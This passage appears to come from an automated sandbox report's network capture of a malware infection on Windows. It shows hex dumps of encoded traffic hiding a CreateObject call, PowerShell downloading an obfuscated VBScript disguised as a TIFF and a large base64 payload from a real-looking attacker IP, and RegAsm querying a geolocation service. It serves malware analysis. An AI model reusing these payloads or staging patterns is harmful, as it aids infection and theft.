                                                      Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                      Aug 28, 2024 06:56:30.438126087 CEST672INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                      Aug 28, 2024 06:56:30.438137054 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                      Aug 28, 2024 06:56:30.438143015 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                      Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
Aug 28, 2024 06:56:30.438199043 CEST | 1236 | IN | Data Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
Aug 28, 2024 06:56:30.438210964 CEST | 1236 | IN | Data Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                      Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2
Aug 28, 2024 06:56:30.438220978 CEST | 1236 | IN | Data Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 43 52 45 61 54 65 4f 42 4a 65 63 74 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                      Data Ascii: 252520%252520%252520CREaTeOBJect%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
Aug 28, 2024 06:56:30.438234091 CEST | 1236 | IN | Data Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                      Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
Aug 28, 2024 06:56:30.443317890 CEST | 1236 | IN | Data Raw: 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32
                                                      Data Ascii: 520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49167 | 192.3.193.155 | 80 | 3912 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:56:35.803028107 CEST | 367 | OUT | GET /xampp/boz/wecreatedbuttersmoothbutterthings.tIF HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.3.193.155
Connection: Keep-Alive
Aug 28, 2024 06:56:36.286940098 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:56:36 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Wed, 28 Aug 2024 01:14:37 GMT
ETag: "2c73a-620b414e89035"
Accept-Ranges: bytes
Content-Length: 182074
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff
                                                      Data Raw: ff fe 0d 00 0a 00 50 00 43 00 41 00 7a 00 62 00 4c 00 4c 00 50 00 7a 00 69 00 20 00 3d 00 20 00 22 00 6a 00 65 00 69 00 47 00 57 00 52 00 57 00 6f 00 4b 00 63 00 22 00 0d 00 0a 00 74 00 63 00 48 00 63 00 5a 00 6b 00 74 00 42 00 57 00 52 00 20 00 3d 00 20 00 22 00 4b 00 57 00 65 00 78 00 7a 00 41 00 47 00 63 00 4c 00 72 00 22 00 0d 00 0a 00 57 00 57 00 57 00 54 00 53 00 69 00 53 00 50 00 71 00 69 00 20 00 3d 00 20 00 22 00 70 00 73 00 6e 00 69 00 5a 00 63 00 61 00 4b 00 69 00 41 00 22 00 0d 00 0a 00 65 00 42 00 6d 00 6a 00 5a 00 42 00 72 00 48 00 6b 00 57 00 20 00 3d 00 20 00 22 00 42 00 63 00 6f 00 6b 00 5a 00 74 00 42 00 57 00 52 00 74 00 22 00 0d 00 0a 00 62 00 70 00 41 00 4c 00 5a 00 42 00 47 00 43 00 63 00 70 00 20 00 3d 00 20 00 22 00 6f 00 57 00 57 00 5a 00 6b 00 47 00 64 00 4b 00 70 00 54 00 22 00 0d 00 0a 00 4c 00 5a 00 41 00 4c 00 75 00 69 00 48 00 78 00 70 00 47 00 20 00 3d 00 20 00 22 00 57 00 43 00 68 00 70 00 4c 00 57 00 4b 00 61 00 57 00 47 00 22 00 0d 00 0a 00 4c 00 70 00 53 00 49 00 [TRUNCATED]
                                                      Data Ascii: PCAzbLLPzi = "jeiGWRWoKc"tcHcZktBWR = "KWexzAGcLr"WWWTSiSPqi = "psniZcaKiA"eBmjZBrHkW = "BcokZtBWRt"bpALZBGCcp = "oWWZkGdKpT"LZALuiHxpG = "WChpLWKaWG"LpSIzkOdLt = "WZKAUidUKb"ANcHiUGnPp = "dUeQecPbLN"QNKGhCOtKH = "tneALQfKGu"sLirzLbZmh = "LHfNfpcqin"KZuKmcLmjW = "ifPZuluWRk"zqmAKGtmhm = "znzdWklLLd"LBmOxffBcL = "CixSfvWkbs"GtUnoLOhci = "nSJWZfvdxT"GLtLWRJKAK = "iWPAItbcWu"kNUUGNpboQ = "mLkULNNALb"cLibQGZLQK = "OcRczBPCT
Aug 28, 2024 06:56:36.286957979 CEST | 1236 | IN | Data Raw: 6e 00 22 00 0d 00 0a 00 0d 00 0a 00 68 00 57 00 48 00 73 00 64 00 48 00 67 00 70 00 74 00 65 00 20 00 3d 00 20 00 22 00 75 00 55 00 65 00 69 00 52 00 52 00 52 00 57 00 75 00 64 00 22 00 0d 00 0a 00 4f 00 75 00 66 00 63 00 4c 00 48 00 6f 00 43 00
                                                      Data Ascii: n"hWHsdHgpte = "uUeiRRRWud"OufcLHoCrm = "vLtaKdNqQK"RUuTkKuLOW = "oBNWWWLhZA"fnQcGxPbma = "KLKiikKLWz"BuWfgAca
Aug 28, 2024 06:56:36.286967039 CEST | 1236 | IN | Data Raw: 20 00 22 00 66 00 4c 00 4c 00 65 00 65 00 6e 00 49 00 4b 00 74 00 68 00 22 00 0d 00 0a 00 7a 00 4c 00 47 00 74 00 6b 00 57 00 6e 00 76 00 78 00 55 00 20 00 3d 00 20 00 22 00 4c 00 57 00 4b 00 57 00 4c 00 57 00 4b 00 4b 00 69 00 57 00 22 00 0d 00
                                                      Data Ascii: "fLLeenIKth"zLGtkWnvxU = "LWKWLWKKiW"ggLLGKIJmW = "cPGUkzLamA"eLBKLfmGbW = "WBePUOPzob"cLbuGNkNiW = "OkKZRoKeUG"
Aug 28, 2024 06:56:36.286978960 CEST | 1236 | IN | Data Raw: 52 00 57 00 62 00 43 00 52 00 68 00 65 00 20 00 3d 00 20 00 22 00 4e 00 7a 00 50 00 64 00 4c 00 72 00 63 00 68 00 4b 00 6d 00 22 00 0d 00 0a 00 63 00 6e 00 66 00 74 00 57 00 62 00 4f 00 65 00 4c 00 43 00 20 00 3d 00 20 00 22 00 69 00 61 00 4b 00
                                                      Data Ascii: RWbCRhe = "NzPdLrchKm"cnftWbOeLC = "iaKzcBIPKa"caLrHBKZiq = "CWLzaocLWR"KKZUAoaLmL = "KjRLfbGNkW"urLpeJSfoW = "KLu
Aug 28, 2024 06:56:36.286988974 CEST | 1236 | IN | Data Raw: 73 00 22 00 0d 00 0a 00 49 00 66 00 75 00 64 00 57 00 4c 00 75 00 42 00 62 00 74 00 20 00 3d 00 20 00 22 00 6f 00 72 00 57 00 76 00 4b 00 74 00 68 00 6b 00 63 00 4e 00 22 00 0d 00 0a 00 4e 00 73 00 67 00 63 00 74 00 57 00 4b 00 57 00 63 00 47 00
                                                      Data Ascii: s"IfudWLuBbt = "orWvKthkcN"NsgctWKWcG = "zpKcPWLaiW"bGTLokCKks = "ALvtAAASLd"cJoLWhxxAU = "LWPAWZWKbk"cWCiiWkW
Aug 28, 2024 06:56:36.286998987 CEST | 1236 | IN | Data Raw: 6c 00 66 00 47 00 6d 00 6b 00 70 00 55 00 65 00 57 00 4e 00 22 00 0d 00 0a 00 6b 00 69 00 4b 00 47 00 69 00 4e 00 63 00 4e 00 76 00 63 00 20 00 3d 00 20 00 22 00 6b 00 47 00 41 00 52 00 4b 00 4c 00 4c 00 6b 00 69 00 64 00 22 00 0d 00 0a 00 62 00
                                                      Data Ascii: lfGmkpUeWN"kiKGiNcNvc = "kGARKLLkid"bKLWCZdnPO = "fWWGkZiWZO"SKKCKKpjck = "LCNaIWJKzz"xWiPebWLPO = "cLILoiGzlc"G
Aug 28, 2024 06:56:36.287012100 CEST | 1236 | IN | Data Raw: 4e 00 74 00 73 00 20 00 3d 00 20 00 22 00 4c 00 41 00 55 00 6e 00 49 00 6b 00 63 00 4f 00 47 00 4b 00 22 00 0d 00 0a 00 69 00 43 00 4c 00 65 00 61 00 50 00 6e 00 57 00 6d 00 6f 00 20 00 3d 00 20 00 22 00 70 00 6e 00 65 00 5a 00 57 00 69 00 55 00
                                                      Data Ascii: Nts = "LAUnIkcOGK"iCLeaPnWmo = "pneZWiUcTR"UobcZLahBP = "cLpNieKfUf"UqfhcbuAGd = "kOdiGWUfnp"blAKAzecLB = "mcOWUWR
Aug 28, 2024 06:56:36.287086964 CEST | 1236 | IN | Data Raw: 62 00 57 00 55 00 66 00 67 00 69 00 62 00 66 00 4c 00 47 00 20 00 3d 00 20 00 22 00 6b 00 41 00 71 00 69 00 49 00 50 00 4a 00 6d 00 55 00 41 00 22 00 0d 00 0a 00 55 00 6e 00 4c 00 47 00 57 00 4a 00 57 00 6a 00 65 00 70 00 20 00 3d 00 20 00 22 00
                                                      Data Ascii: bWUfgibfLG = "kAqiIPJmUA"UnLGWJWjep = "JGcRPKtszu"nriPoKWRok = "SLdkANbmGc"fRchCtWKiH = "ecKjxiLWZP"ijHcfOxhih =
Aug 28, 2024 06:56:36.287111044 CEST | 1236 | IN | Data Raw: 4b 00 4c 00 6e 00 54 00 55 00 4e 00 22 00 0d 00 0a 00 57 00 55 00 63 00 47 00 4c 00 4c 00 4c 00 74 00 62 00 4a 00 20 00 3d 00 20 00 22 00 75 00 62 00 4b 00 57 00 73 00 4c 00 4c 00 63 00 4a 00 54 00 22 00 0d 00 0a 00 0d 00 0a 00 76 00 43 00 47 00
                                                      Data Ascii: KLnTUN"WUcGLLLtbJ = "ubKWsLLcJT"vCGiZOeLhe = "WZpUcSacaf"GpiiNCLhmW = "jbNqiPkCnS"cdkRTioGic = "pCWiUhoZZK"mKi
Aug 28, 2024 06:56:36.287122011 CEST | 1236 | IN | Data Raw: 63 00 51 00 66 00 65 00 47 00 20 00 3d 00 20 00 22 00 7a 00 41 00 4a 00 70 00 4c 00 7a 00 4b 00 63 00 4c 00 55 00 22 00 0d 00 0a 00 75 00 75 00 69 00 76 00 55 00 55 00 47 00 61 00 63 00 6d 00 20 00 3d 00 20 00 22 00 4c 00 63 00 69 00 66 00 57 00
                                                      Data Ascii: cQfeG = "zAJpLzKcLU"uuivUUGacm = "LcifWWmtAT"LkNIUUWekj = "KRgLWLWWup"AoiCZLLUer = "LnqcOPGtLv"iUdhiceKzh = "CxGig
Aug 28, 2024 06:56:36.292040110 CEST | 1236 | IN | Data Raw: 69 00 61 00 6d 00 22 00 0d 00 0a 00 4c 00 50 00 61 00 6c 00 4c 00 57 00 5a 00 6e 00 4b 00 55 00 20 00 3d 00 20 00 22 00 65 00 76 00 4a 00 74 00 66 00 55 00 70 00 6a 00 4b 00 71 00 22 00 0d 00 0a 00 68 00 76 00 68 00 43 00 42 00 70 00 47 00 55 00
                                                      Data Ascii: iam"LPalLWZnKU = "evJtfUpjKq"hvhCBpGUOk = "QImrHLhecf"LSOBPGHCLA = "mPWkNiKzki"LschApKLaW = "WdtivUNBGf"GiJWmAiT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49169 | 192.3.193.155 | 80 | 2848 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:56:43.843759060 CEST | 81 | OUT | GET /xampp/boz/REDS.txt HTTP/1.1
Host: 192.3.193.155
Connection: Keep-Alive
Aug 28, 2024 06:56:44.322316885 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 04:56:44 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Wed, 28 Aug 2024 01:12:17 GMT
ETag: "a1000-620b40c95ea2b"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                                      Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
Aug 28, 2024 06:56:44.322334051 CEST | 224 | IN | Data Raw: 34 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67
                                                      Data Ascii: 4gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW
Aug 28, 2024 06:56:44.322477102 CEST | 1236 | IN | Data Raw: 31 41 56 4e 4d 56 44 53 31 67 54 4e 30 55 44 4a 31 77 51 4e 45 55 44 41 30 77 50 4e 34 54 44 36 30 51 4f 4e 55 54 44 76 30 51 4c 4e 77 53 44 72 30 77 4a 4e 59 53 44 69 30 41 48 4e 6f 52 44 5a 30 51 46 4e 51 52 44 51 30 67 43 4e 67 51 44 48 30 77
                                                      Data Ascii: 1AVNMVDS1gTN0UDJ1wQNEUDA0wPN4TD60QONUTDv0QLNwSDr0wJNYSDi0AHNoRDZ0QFNQRDQ0gCNgQDH0wANIMD8zw+MoPD5zA9MIPDxAAQAcBgBQDQOokDJAAAAMAgBADAAA0D8AAAAMAgBwCAOwjD64QJOQiDj4gFO4gDF3w/N4fD63A9NYeDi3w2NodDS3Q0NAdDPAAAAwAgBQCgNAZDP1AcN8WDu1QbNwWDr1gaNcWDm1QZ
Aug 28, 2024 06:56:44.322490931 CEST | 1236 | IN | Data Raw: 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a
                                                      Data Ascii: EnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33Q9NMfDx3w7N0eDr3Q6NceDl3w4NEeDf3Q3NsdDZ3w1NUdDT3Q0N8cDN3wyNkcDH3QxNMcDB2wvN0bD
Aug 28, 2024 06:56:44.322506905 CEST | 1236 | IN | Data Raw: 36 77 6e 4f 34 70 44 64 36 41 6e 4f 73 70 44 61 36 51 6d 4f 67 70 44 58 36 67 6c 4f 55 70 44 55 36 77 6b 4f 49 70 44 52 36 41 6b 4f 38 6f 44 4f 36 51 6a 4f 77 6f 44 4c 36 67 69 4f 6b 6f 44 49 36 77 68 4f 59 6f 44 46 36 41 68 4f 4d 6f 44 43 36 51
                                                      Data Ascii: 6wnO4pDd6AnOspDa6QmOgpDX6glOUpDU6wkOIpDR6AkO8oDO6QjOwoDL6giOkoDI6whOYoDF6AhOMoDC6QgOAkD/5gfO0nD85weOonD55AeOcnD25QdOQnDz5gcOEnDw5wbO4mDt5AbOsmDq5QaOgmDn5gZOUmDk5wYOImDh5AYO8lDe5QXOwlDX5gVOUlDU4QGOghDX4gFAAAA4AUAwAAAA1AdNIXDw1gbNwWDq1AaNYWDk1gY
Aug 28, 2024 06:56:44.322515965 CEST | 1236 | IN | Data Raw: 45 6b 44 2f 35 51 66 4f 73 6e 44 35 35 77 64 4f 55 6e 44 7a 35 51 63 4f 38 6d 44 74 35 77 61 4f 6b 6d 44 6e 35 51 5a 4f 4d 6d 44 68 35 77 58 4f 30 6c 44 62 35 51 57 4f 63 6c 44 56 35 77 55 4f 45 6c 44 50 35 51 54 4f 73 6b 44 4a 35 77 52 4f 55 6b
                                                      Data Ascii: EkD/5QfOsnD55wdOUnDz5QcO8mDt5waOkmDn5QZOMmDh5wXO0lDb5QWOclDV5wUOElDP5QTOskDJ5wROUkDD5QAO8jD94wOOkjD34QNOMjDx4wLO0iDr4QKOciDl4wIOEiDf4QHOshDZ4wFOUhDT4QEO8gDN4wCOkgDH4QBOMgDB3w/N0fD73Q+NcfD13w8NEfDv3Q7NseDp3w5MAPDvzg7M0ODszw6MoODpzA6McODmzQ5MQOD
Aug 28, 2024 06:56:44.322525978 CEST | 896 | IN | Data Raw: 2f 6f 39 50 77 2b 54 61 2f 6b 30 50 39 38 54 4d 2f 30 78 50 52 34 7a 72 2b 63 71 50 4a 36 54 67 2b 6b 6e 50 78 35 54 61 2b 6f 52 50 2b 7a 54 63 38 63 47 50 39 77 44 4d 37 34 38 4f 39 75 7a 74 37 49 37 4f 73 75 6a 6a 37 55 34 4f 38 74 7a 5a 36 4d
                                                      Data Ascii: /o9Pw+Ta/k0P98TM/0xPR4zr+cqPJ6Tg+knPx5Ta+oRP+zTc8cGP9wDM748O9uzt7I7Osujj7U4O8tzZ6MuOKrjg6AnOjpDW6QjOEkz950dOyljM48zN/az4245MgPj2xobMxFTTxoTMuEjIxYBMRDTuw4IMvBDXwAFMEBzHAAAAMCQBgBAAA8D9/I7Pp+zo/g5PN+zc/00Pz8TA+ktPp6Tk+4iPS0zt9waPO2Dh9EXPmtDV6Uc
Aug 28, 2024 06:56:44.322536945 CEST | 1236 | IN | Data Raw: 31 67 5a 4e 4b 57 54 65 31 77 57 4e 68 56 54 49 31 77 41 4e 34 54 44 37 30 4d 4b 4e 6a 52 44 55 30 34 43 4e 49 4d 54 35 7a 77 35 4d 58 4f 54 6b 7a 77 34 4d 61 4e 7a 44 79 67 75 4d 30 4b 6a 49 79 38 51 4d 5a 48 6a 6f 78 30 57 4d 6b 46 6a 56 78 45
                                                      Data Ascii: 1gZNKWTe1wWNhVTI1wAN4TD70MKNjRDU04CNIMT5zw5MXOTkzw4MaNzDyguM0KjIy8QMZHjox0WMkFjVxEUMRAj+w8OMbDD0wsMMqCTfAAAAwCABwDgPr5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYP
Aug 28, 2024 06:56:44.322550058 CEST | 1236 | IN | Data Raw: 38 30 7a 4c 39 51 43 50 31 7a 7a 31 38 49 4e 50 4e 7a 6a 77 38 59 4b 50 43 79 7a 54 38 6f 45 50 46 78 6a 4f 38 6b 77 4f 6c 76 44 34 37 73 39 4f 51 76 44 74 37 30 35 4f 43 75 54 66 37 67 33 4f 74 74 54 55 37 45 30 4f 67 73 7a 47 37 59 78 4f 4c 6f
                                                      Data Ascii: 80zL9QCP1zz18INPNzjw8YKPCyzT8oEPFxjO8kwOlvD47s9OQvDt705OCuTf7g3OttTU7E0OgszG7YxOLoT66ctO5qDt68qOkqDi6MnOJpDR68jO0oDG64QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj
Aug 28, 2024 06:56:44.322560072 CEST | 1236 | IN | Data Raw: 41 51 41 49 41 73 7a 59 34 55 78 4e 34 66 6a 70 33 41 6b 4e 6f 55 7a 61 31 49 54 4e 4d 51 44 30 7a 4d 2f 4d 42 49 44 30 79 49 54 4d 74 48 6a 75 78 67 57 4d 37 45 6a 44 77 77 46 41 41 41 41 4d 41 51 41 45 41 41 41 41 2f 63 36 50 33 35 54 4b 39 49
                                                      Data Ascii: AQAIAszY4UxN4fjp3AkNoUza1ITNMQD0zM/MBID0yITMtHjuxgWM7EjDwwFAAAAMAQAEAAAA/c6P35TK9IePH2Te7EkO1lTS4kLOTijd3QoNeazN2QSNxXTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gK
Aug 28, 2024 06:56:44.327753067 CEST | 1236 | IN | Data Raw: 69 47 44 6e 78 59 5a 4d 51 47 7a 69 78 55 59 4d 2f 46 54 65 78 51 58 4d 75 46 44 61 78 49 57 4d 64 46 7a 56 78 45 56 4d 4c 46 6a 52 78 41 55 4d 36 45 44 4e 78 38 53 4d 70 45 7a 49 78 30 52 4d 59 45 6a 45 78 77 51 4d 47 45 54 41 77 73 50 4d 31 44
                                                      Data Ascii: iGDnxYZMQGzixUYM/FTexQXMuFDaxIWMdFzVxEVMLFjRxAUM6EDNx8SMpEzIx0RMYEjExwQMGETAwsPM1Dz7woOMkDj3wgNMTDTzwcMMBDDvwYLMwCjqwUKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49172 | 178.237.33.50 | 80 | 3024 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 06:56:47.243263006 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Aug 28, 2024 06:56:47.844196081 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Wed, 28 Aug 2024 04:56:47 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
